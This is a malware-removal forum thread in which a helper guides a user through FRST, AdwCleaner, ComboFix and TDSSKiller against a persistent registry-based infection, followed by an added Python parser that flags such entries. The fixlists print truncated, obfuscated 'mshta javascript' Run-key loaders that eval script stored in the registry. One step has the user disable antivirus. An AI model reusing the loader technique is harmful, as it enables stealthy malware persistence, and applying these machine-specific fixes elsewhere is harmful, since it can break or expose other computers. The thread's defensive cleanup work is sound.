Infection blocked: constant messages.

I keep getting the above. The message contains these:

URL: http://filter.infinity-info.com/filter?q={query&i=qsgAPfw0I1o_1&t=1204682193

Infection: URL:Mal2

Process: C:\Program Files\Internet Explorer\iexplore.exe

I have run Full Scan & Boot-time scans. I uninstalled Internet Explorer from day one and even deleted the contents of the Internet Explorer folder mentioned in the message bar, except for 2 dlls, ieproxy.dll & sqmapi.dll, which I have been unable to remove even after taking ownership of them.

Would appreciate some advice on how to stop this nightmare. First time ever in many years of Avast use that I’ve encountered such an issue.

Thanks

Joaquin

Could you screenshot the Avast popup, please?

Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

  • Right-click to run as administrator (XP users: click Run after receipt of the Windows Security Warning - Open File). When the tool opens, click Yes to the disclaimer.
  • Select Additions at the bottom.
  • Press the Scan button.

https://dl.dropboxusercontent.com/u/73555776/frst.JPG

  • It will produce a log called FRST.txt in the same directory the tool is run from.
  • Please attach both logs generated.

Sorry for the delay getting back.
Logs and screenshot attached.

Thanks

Joaquin

This probably came from one of your torrented movies.

CAUTION: This fix is only valid for this specific machine; using it on another may break your computer.

Open notepad and copy/paste the text in the quotebox below into it:

CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [**7963cd85<*>] => mshta javascript:cWaIf4Z="q7";I6X=new%20ActiveXObject("WScript.Shell");Yim1jLRE8="2DzVW7p1";q7ti3T=I6X.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");CxM0MaI0="p";eval(q7ti3T);Wn3p0erZkM (the data entry has 13 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM-x32\...\Run: [**7963cd85<*>] => mshta javascript:cWaIf4Z="q7";I6X=new%20ActiveXObject("WScript.Shell");Yim1jLRE8="2DzVW7p1";q7ti3T=I6X.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");CxM0MaI0="p";eval(q7ti3T);Wn3p0erZkM (the data entry has 13 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Policies\Explorer\Run: [**aefe7890<*>] => mshta javascript:LDvUT1uG="J4";bq3=new%20ActiveXObject("WScript.Shell");zKSEG9Se="hlG5kdljkX";Dc3K0E=bq3.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");klTB8VpgQ="q";eval(Dc3K0E);K5cW9em (the data entry has 14 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [EEDSpeedLauncher] => rundll32.exe C:\Windows\system32\eed_ec.dll,SpeedLauncher
HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [**7963cd85<*>] => mshta javascript:WmyABn1BA0="YGDl";wN7=new%20ActiveXObject("WScript.Shell");Lpi4jqN4="UY3";qC4sm2=wN7.RegRead("HKCU\\software\\3ba89a97d2\\7d1deee2");TVDlVH1="BVV88jRnqS";eval(qC4sm2);QSLnTBa8F="ZfZml (the data entry has 6 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.mystartsearch.com/?type=hppp&ts=1423696213&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.mystartsearch.com/web/?type=dspp&ts=1423696213&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.mystartsearch.com/web/?type=dspp&ts=1423696213&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope value is missing
SearchScopes: HKU\S-1-5-21-1306190550-1966074902-702322317-1000 -> {2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} URL = http://www.mystartsearch.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493&ts=1423696235&type=default&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1306190550-1966074902-702322317-1000 -> {B1C519C5-8E0B-4901-8A28-C3DEDC5AC32E} URL = http://www.mystartsearch.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493&ts=1423696235&type=default&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1306190550-1966074902-702322317-1000 -> {E733165D-CBCF-4FDA-883E-ADEF965B476C} URL = http://www.mystartsearch.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493&ts=1423696235&type=default&q={searchTerms}
Toolbar: HKU\S-1-5-21-1306190550-1966074902-702322317-1000 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File
Toolbar: HKU\S-1-5-21-1306190550-1966074902-702322317-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
U3 aiiiti6k; C:\Windows\System32\Drivers\aiiiti6k.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
DeleteKey: HKLM\software\Wow6432Node\3ba89a97d2
DeleteKey: HKCU\software\3ba89a97d2
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe

https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG

Run FRST and press Fix.
On completion a log will be generated; please post that.

Thanks for your help. I did as instructed and the log is attached. However, pop-ups continue.

Joaquin

Could I have a fresh FRST scan, please?

Please download AdwCleaner by Xplode onto your desktop.

  • Close all open programs and internet browsers.
  • Double-click on AdwCleaner.exe to run the tool.
  • Click on Scan.
  • After the scan is complete, click on “Clean”.
  • Confirm each time with OK.
  • Your computer will be rebooted automatically. A text file will open after the restart.
  • Please post the content of that logfile with your next answer.
  • You can find the logfile at C:\AdwCleaner[S0].txt as well.

Done as instructed. See attached.

Much obliged for your help with all this.

Regards

Joaquin

Pop ups continue.

Hmm, the exact same infection is showing; let's try once more.

CAUTION: This fix is only valid for this specific machine; using it on another may break your computer.

Open notepad and copy/paste the text in the quotebox below into it:

CreateRestorePoint:
HKLM-x32\...\Run: [**7963cd85<*>] => mshta javascript:MM6YG3zKFz="UqC9I";m8g2=new%20ActiveXObject("WScript.Shell");GGMcA9Lr="uTNbxYW";RdsV89=m8g2.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");akfWMd2lF="4xtLoV7";eval(RdsV8 (the data entry has 19 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Policies\Explorer\Run: [**aefe7890<*>] => mshta javascript:CY92tCCLnU="Oxlq5";k89k=new%20ActiveXObject("WScript.Shell");D1vHYMFcu="Vs";HUX4o5=k89k.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");q8CxhVuml="ox";eval(HUX4o5);WPSGc5 (the data entry has 10 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [**7963cd85<*>] => mshta javascript:KW3zbLY="Ecdu260TGk";c8K1=new%20ActiveXObject("WScript.Shell");VoHdg6jDS="ckvS2tBx";w1SX4s=c8K1.RegRead("HKCU\\software\\3ba89a97d2\\7d1deee2");NK6ft7kv="xoUxfLX7m";eval(w1SX4s);gP22F (the data entry has 19 more characters). <===== ATTENTION (Value Name with invalid characters)
U3 ar5yet3c; C:\Windows\System32\Drivers\ar5yet3c.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [Amazon Music] => C:\Users\ideoplastic\AppData\Local\Amazon Music\Amazon Music Helper.exe [5887808 2015-07-21] ()
DeleteKey: HKLM\software\Wow6432Node\3ba89a97d2
DeleteKey: HKCU\software\3ba89a97d2
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe

https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG

Run FRST and press Fix.
On completion a log will be generated; please post that.

THEN

Download and Install Combofix

Download ComboFix from one of the following locations:
Link 1
Link 2

VERY IMPORTANT!!! Save ComboFix.exe to your Desktop.

  • IMPORTANT - Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. If you have difficulty properly disabling your protective programs, refer to this link here

  • Double-click on ComboFix.exe & follow the prompts.
  • Accept the disclaimer and allow it to update if it asks.

http://img.photobucket.com/albums/v706/ried7/NSIS_disclaimer_ENG.png

http://img.photobucket.com/albums/v706/ried7/NSIS_extraction.png

  • When finished, it shall produce a log for you.
  • Please include the C:\ComboFix.txt in your next reply.

Notes:

  1. Do not mouse-click Combofix’s window while it is running. That may cause it to stall.
  2. Do not “re-run” Combofix. If you have a problem, reply back for further instructions.
  3. If after the reboot you get errors about programmes being marked for deletion then reboot, that will cure it.

Please make sure you include the ComboFix log in your next reply, as well as a description of how your computer is running now.

Followed the instructions to the letter. Did an FRST scan and the log file is attached. Then ran ComboFix, which scanned and then rebooted after completion; on returning to the Desktop another window opened and started to create a log file, but unfortunately it came up with an error because of a disk error, damaged or something like that. I was unable to take a screenshot because my PC was sort of frozen and I had to reboot once more. I’ve only had one pop-up for the last hour or so.

OK, could I have a fresh FRST scan please, so that I can be sure the malware has gone?

Still getting pop-ups

Attached screenshot of pop-up and new Scan.

OK, the only thing I can think of at the moment is that an MBR-type rootkit is re-installing it after I remove it.

So I will check that out. Are you downloading anything after running the FRST fix ?

Download the latest version of TDSSKiller from here and save it to your Desktop.

  • Double-click on TDSSKiller.exe to run the application.

https://dl.dropbox.com/u/73555776/tdss%20start.JPG

  • Then click on Change parameters.

https://dl.dropbox.com/u/73555776/tdss%20Change%20param.JPG

  • Check the boxes beside Verify Driver Digital Signature, Detect TDLFS file system and Use KSN to scan objects, then click OK.

  • Click the Start Scan button.

  • If a suspicious object is detected, the default action will be Skip; click on Continue.

https://dl.dropbox.com/u/73555776/tdss%20threat.JPG

  • If malicious objects are found, they will show in the Scan results and offer three (3) options.
  • Ensure Cure is selected, then click Continue => Reboot now to finish the cleaning process.

  • Get the report by selecting Reports.

https://dl.dropbox.com/u/73555776/tdss%20report.JPG

  • Note: If Cure is not available, please choose Skip instead; do not choose Delete unless instructed.

Please copy and paste its contents on your next reply.

Nothing found, but a pop-up came up while it was scanning. Probably the best thing for me is to back up and rebuild.

Extremely grateful for your help. If you were really in Essex I’d buy you a pint!

Bests

Joaquin

Do you have anything on your system that is protecting the registry, as that is where the malware is hiding?

Sorry for the delay. I checked the services and Windows Defender was active, so I switched it off, ran AdwCleaner followed by ComboFix, and after the reboots no more pop-ups. All going well for a number of hours.

Thanks

Joaquin

Could you post the ComboFix log please, and a fresh FRST?

Sorry for the delay. Will post this evening when I get home.

Regards

Joaquin

I guess I shouted victory prematurely. Last night no pop ups appeared, but this evening they are back in force.

Attached the requested files.

Regards

Joaquin

This malware is normally monitored by a blank Run key, which is not showing in your logs. I wonder if they have now changed the monitor file.

Could you attach the ComboFix log, as that should show any hidden entries?

CAUTION: This fix is only valid for this specific machine; using it on another may break your computer.

Open notepad and copy/paste the text in the quotebox below into it:

CreateRestorePoint:
HKLM-x32\...\Run: [WinampAgent] => "C:\Program Files (x86)\Winamp\winampa.exe"
HKLM-x32\...\Run: [**7963cd85<*>] => mshta javascript:WxBVRTj8="uA9IbaM";By8=new%20ActiveXObject("WScript.Shell");uFAG7tSc="q";Xp9rl=By8.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");PvrlG9gl="ibKw";eval(Xp9rl);ZQiPL1Nj7=" (the data entry has 3 more characters). <===== ATTENTION (Value Name with invalid characters)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer\Run: [**aefe7890<*>] => mshta javascript:UxeT5lmg="jmSAvJRzh";Y0Z3=new%20ActiveXObject("WScript.Shell");gNq4NQ5BS="b7s0";y8tY6J=Y0Z3.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");o8L2EIQxFQ="eny9";eval(y8tY6J) (the data entry has 22 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [**7963cd85<*>] => mshta javascript:IZZV6c3B="iVQKNdj6Kx";oU6=new%20ActiveXObject("WScript.Shell");m7OBrFG="yABojYeU";UvI7n=oU6.RegRead("HKCU\\software\\3ba89a97d2\\7d1deee2");imRn88mkR="nGnZ5Wx";eval(UvI7n);b1TtfvD="qe (the data entry has 8 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1306190550-1966074902-702322317-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
U3 a16ip6jg; C:\Windows\System32\Drivers\a16ip6jg.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
2015-07-27 20:54 - 2015-07-27 20:58 - 00000000 ____D C:\Users\ideoplastic\AppData\OICE_15_974FA576_32C1D314_2688
2015-07-27 20:54 - 2015-07-27 20:54 - 00000000 ____D C:\Users\ideoplastic\AppData\OICE_15_974FA576_32C1D314_3418
2015-07-26 09:22 - 2015-07-26 09:22 - 00685200 _____ () C:\Users\ideoplastic\Downloads\setup.exe
Task: {6D0F3D86-B01F-4AA2-9771-0552DF52FA5C} - System32\Tasks\Amazon Music Helper => C:\Users\ideoplastic\AppData\Local\Amazon Music\Amazon Music Helper.exe [2015-07-21] ()
C:\Windows\System32\Drivers\a16ip6jg.sys
DeleteKey: HKCU\software\3ba89a97d2
DeleteKey: HKLM\\software\Wow6432Node\3ba89a97d2
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe

https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG

Run FRST and press Fix.
On completion a log will be generated; please post that.
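Added example, not from this thread and not part of FRST: a small Python parser for FRST Run-value lines of the kind quoted in the fixes above. It flags the blank Run value the helper describes as the malware's monitor, value names with characters regedit cannot display, and the mshta loader that reads its script out of the registry, and then emits the DeleteKey lines for the parent key the loader reads, which is the same key the fixes above delete. The sample log lines are constructed from the entries in this thread with the scripts shortened; the function and variable names are my own.

```python
import re

# Constructed sample of FRST log lines, modelled on the entries quoted in this
# thread with the scripts shortened and one benign entry added; not the real log.
SAMPLE_LOG = r"""
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [**7963cd85<*>] => mshta javascript:a="q7";b=new%20ActiveXObject("WScript.Shell");c=b.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");eval(c); <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Policies\Explorer\Run: [**aefe7890<*>] => mshta javascript:d=new%20ActiveXObject("WScript.Shell");e=d.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");eval(e);
HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [**7963cd85<*>] => mshta javascript:f=new%20ActiveXObject("WScript.Shell");g=f.RegRead("HKCU\\software\\3ba89a97d2\\7d1deee2");eval(g);
HKLM-x32\...\Run: [WinampAgent] => "C:\Program Files (x86)\Winamp\winampa.exe"
"""

# FRST prints autostart values as:  <key>: [<value name>] => <value data>
RUN_LINE = re.compile(r'^(?P<key>HK\S*?\\Run): \[(?P<name>[^\]]*)\] => (?P<data>.*)$')
REGREAD = re.compile(r'RegRead\("([^"]+)"\)')

def analyse_run_value(line):
    """(verdict, registry path the loader reads); ('clean', None) if benign; None if not a Run value."""
    m = RUN_LINE.match(line)
    if not m:
        return None
    name, data = m.group('name'), m.group('data')
    if name == '':  # the blank Run value the helper calls the malware's monitor
        return ('blank value name (watchdog entry)', None)
    reasons = []
    if any(c in name for c in '*<>|?'):
        reasons.append('value name with characters regedit cannot display')
    if data.lower().startswith('mshta javascript:') and 'RegRead(' in data and 'eval(' in data:
        reasons.append('mshta loader evaluating script stored in the registry')
    if not reasons:
        return ('clean', None)
    hit = REGREAD.search(data)
    # JScript source doubles its backslashes; undo that to get the real path
    return ('; '.join(reasons), hit.group(1).replace('\\\\', '\\') if hit else None)

def build_fixlist(log_text):
    """Mirror the thread's fixes: quote flagged lines verbatim, then DeleteKey the key storing the script."""
    flagged, payload_keys = [], []
    for line in log_text.splitlines():
        result = analyse_run_value(line.rstrip())
        if result is None or result[0] == 'clean':
            continue
        flagged.append(line.rstrip())
        if result[1]:
            parent = result[1].rsplit('\\', 1)[0]  # value 7d1deee2 lives under key 3ba89a97d2
            if parent not in payload_keys:
                payload_keys.append(parent)
    return (['CreateRestorePoint:'] + flagged
            + ['DeleteKey: ' + k for k in payload_keys] + ['RemoveProxy:', 'EmptyTemp:'])
```

Running `build_fixlist` over a real FRST.txt reproduces the shape of the fixlists in this thread; the non-Run entries (SearchScopes, zero-byte drivers, tasks) still have to be picked by hand.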

Thanks.

ComboFix refuses to create a log, and the Fix’s logs are also attached.

Regards

No pop-ups so far since turning on the PC 1:15 ago!